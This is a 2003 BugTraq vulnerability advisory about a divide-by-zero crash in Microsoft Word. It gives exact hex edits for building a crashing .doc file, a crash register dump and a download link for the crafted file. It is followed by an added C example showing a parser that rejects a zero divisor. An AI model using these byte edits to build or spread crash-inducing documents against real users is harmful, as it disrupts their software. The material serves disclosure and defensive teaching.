BugTraq
Bug in Microsoft Word
Oct 03 2003 06:15PM
Bahaa Naamneh (b_naamneh hotmail com)
Bug in Microsoft Word
Affected Systems: Microsoft Word 97, 98(J), 2000, 2002
Release Date: September 28, 2003
Technical Description:
=============
The following steps can be performed in order to create a proof of
concept Word document:
1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
These bytes were taken from a .doc file of Microsoft Word 2002 (10.2627.3311):
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4. Change them as follows:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5. Open modified .doc file.
6. Microsoft Word will crash.
Integer Divide by Zero:
30405E1E div eax,edi
EAX = 62626262 EBX = 0091FDC0
ECX = 00008000 EDX = 00000000
ESI = 00000000 EDI = 00000000
EIP = 30405E1E ESP = 001263A8
EBP = 00126EE4 EFL = 00000246
The div instruction divides eax by edi.
If edi = 0,
then anything/0 can't happen.
* The modified .doc file can be downloaded from:
http://www12.brinkster.com/bsecurity/Doc1.doc
Vendor status:
=========
The vendor has been informed.
Discovered by/Credit:
=============
Bahaa Naamneh
b_naamneh (at) hotmail (dot) com [email concealed]
http://www.bsecurity.tk
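Added illustration (not part of the original post or of Microsoft's code): a small C parser that reads two little-endian 32-bit fields from an untrusted file header and divides one by the other, which is the bug class the crash dump above shows (a value from the file reaches a divisor register and div faults when it is zero). The field layout, the names, and the hostile header are assumptions; the values 0x1b4 and 0x20 are taken from the byte dump in the report, but the report does not say what those offsets mean, so their interpretation here is constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Little-endian 32-bit read, the byte order used in the dump above. */
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

enum parse_status { PARSE_OK = 0, PARSE_TRUNCATED = 1, PARSE_ZERO_DIVISOR = 2 };

/* Assumed header layout (not from the report): bytes 0..3 = total payload
 * length, bytes 4..7 = record size. The parser wants total / size.
 *
 * The unchecked form would be simply `*records = total / size;`. On x86 that
 * compiles to a div whose divisor comes straight from the file, which is the
 * "div eax,edi" with edi == 0 in the crash dump. The hardened form below
 * rejects a zero divisor before the division is reached. */
enum parse_status record_count(const uint8_t *buf, size_t len, uint32_t *records) {
    if (len < 8) return PARSE_TRUNCATED;          /* not enough header */
    uint32_t total = read_le32(buf);
    uint32_t size  = read_le32(buf + 4);
    if (size == 0) return PARSE_ZERO_DIVISOR;     /* the missing check */
    *records = total / size;
    return PARSE_OK;
}

/* Constructed sample headers. BENIGN uses b4 01 00 00 / 20 00 00 00 from the
 * report's dump (0x1b4 = 436, 0x20 = 32). HOSTILE puts the report's 62 62 62 62
 * in the first field and zeroes the divisor, mirroring EAX = 62626262, EDI = 0. */
static const uint8_t BENIGN[8]  = {0xb4, 0x01, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00};
static const uint8_t HOSTILE[8] = {0x62, 0x62, 0x62, 0x62, 0x00, 0x00, 0x00, 0x00};

/* Returns the record count for the benign header, or -1 on any error. */
int benign_records(void) {
    uint32_t n = 0;
    return record_count(BENIGN, sizeof BENIGN, &n) == PARSE_OK ? (int)n : -1;
}

/* Returns the parse status for the hostile header (PARSE_ZERO_DIVISOR). */
int hostile_status(void) {
    uint32_t n = 0;
    return (int)record_count(HOSTILE, sizeof HOSTILE, &n);
}

/* Returns the parse status for a header cut short (PARSE_TRUNCATED). */
int truncated_status(void) {
    uint32_t n = 0;
    return (int)record_count(BENIGN, 4, &n);
}

int main(void) {
    printf("benign: %d records\n", benign_records());      /* 13 */
    printf("hostile: status %d\n", hostile_status());       /* 2  */
    printf("truncated: status %d\n", truncated_status());   /* 1  */
    return 0;
}
```

The point for a reviewer or fuzz triager is that the faulting instruction is rarely the bug; the bug is the earlier step where a file field was trusted as a divisor, and the fix is a range check at the parse boundary rather than an exception handler around the division.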